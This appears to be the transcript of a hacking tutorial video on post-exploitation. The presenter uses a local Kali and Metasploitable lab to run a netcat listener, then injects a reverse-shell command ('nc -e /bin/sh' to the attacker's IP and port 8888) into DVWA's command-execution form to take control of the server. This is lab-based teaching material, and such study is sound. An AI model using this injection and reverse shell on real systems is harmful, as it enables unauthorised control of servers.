everyone. So in this video, I will let you know about the post exploitation. So this is the part one, and I will let you know with the example. So let's start. So guys, here you can see I'm using two machine in my VM. So this is the Metasploit machine and this is the Kali machine, right? So why I'm using second machine, I will let you know. So you can see in my Kali machine, I have used the IP, this one. So this is the IP of my second machine, and this second machine IP is like you can see in the address bar, and through that, if you enter here, through that I am able to access these five website where we can uh, like test or whatever we want. We have like five website here and we can do anything on this for the testing purpose, right? So that's why I have run the second machine. So you can also make this type of lab on your local. I have on dedicated lecture on this, so you can also visit that. So we will start with the DVWA website. For example, this is your target, so click on this. So here we will uh, do the example. So you can see currently my security is low, you can see here. And if I go to there is a multiple tab for the multiple attacks to execute. So we will do on command execution here, right? And just go to your terminal, we will type the command here for the hack the system. So basically guys, this will be the reverse shell. Here you can see, or you will see, because like we will start with the reverse shell because this is also part of post exploitation, but we know this is like don't give them much capability as Weebly. Like I have already let you know about the Weebly in my past lecture. So Weebly is the more comfortable and give the more execute command on the target system and like more powerful tool, right? But this is also, so we will start from this, then we will go to the Weebly side, right? So I have open my terminal here. So we will like type a command to listen the port on port, like because this is the reverse shell, that means someone will connect with our system from the like from target to our system. So I'm here like type nc means netcat. I have already let you know in my past lecture. If you notice, then go to the my past lecture or my in my past tutorial videos, because I have covered all like lecture with the tutorial. So and see, I'm just going to little bit faster because I have already covered these all thing. If you my old student. So and see, then vv hyphen vv hyphen l hyphen p, that is the port. And you can here type the port anything whatever you want. So I'm typing just 8888, right? I'm entering here. So you can see I'm listening uh, on the port 8888. That means someone from outside will try to connect me, right? So that is called reverse shell. If you go to here, so you can type if config command to get your id IP address. So this is my IP address, right? So that means my Kali IP address is this one, right? And I'm listening here, and someone tried to connect me, right? So now I will go to the target website. So for example, this is my website here, as I already let you know. So I will try to connect from here, right? So for that, I will type a command in this execution bar. If you see here, if I type the command my IP 192.168 or 0.175.128, I think this was my IP. Let me check. Yeah, this is my IP. If I submit here, so what happened? Let's see. Okay, it's three packet transmitted, you can see, and three received. Zero packet, 0% packet lost. So this basically what this command working, this like this step working as a, it will ping you, it will ping on your ID on your IP address whatever you type in this text box. If that will be working or that will be up, so it will return the result here. You can see 3 packet send or 3 packet receive. That means we have 0% lost. That means the machine is up, right, not down. So this is work of this tab. So now we can inject our code here. So we will type our injectable code here. So I will type, like you can type any IP. I'm just typing this one because it will not return anything result, or we don't need to result, we want other code to be execute space. Then I will type here the netcat command where we use this is the command netcat and c hyphen e, then bin, then sh, and then IP, your IP. So my IP was, my system IP was 192.168.175.128. This is my IP, and in this IP I was listening up listening here. If you can see here, so I am already listening. Someone tried to connect me, then my machine will connect with that system. So I was listening port uh, 8888, right? So I will type this port here, right? So now I will submit button click. So that means this command, my these are the two commands here. First one, this one. So I don't need to the result of this one. I mainly need this one. So this is the second command will execute when I click on submit button. So this command will try to connect with my system because this is the reverse shell. Reverse shell means someone from the our target will try to connect our core machine, right? So if we are able to connect that, that means this website system or server will be hacked, right? So like I'm clicking here submit button, so I have submit here. So you can see this is going on here, it is processing, but still command already execute through the backend. If you go to here, you can see my machine able to connect right here, connect to this one from unknown machine, right? This is my IP, you can see, and this is the server IP, right? You can see that means my machine is already connect now with this IP. Now I can do anything on that server where website is hosted. Basically guys, website is hosted any machine, right? You know. So or that machine IP this one, and my IP this one. So that means I am already connect now with this IP. So I can do anything, I can execute any command here, whatever I want I can do. So in my upcoming part, uh, is this post exploitation, in my upcoming part I will let you know what type of command we can execute here, or what like access we will get, or whatever we can do, I will let you know in my second lecture. So in this lecture this is all, and you can subscribe my channel to get the upcoming latest video on hacking. And I already upload my like multiple video, I already upload the hacking tutorial in my description. I will let you know the link, so you can also visit that all videos, my full tutorial and my playlist, so you will get the all videos. So that's all guys, thank you.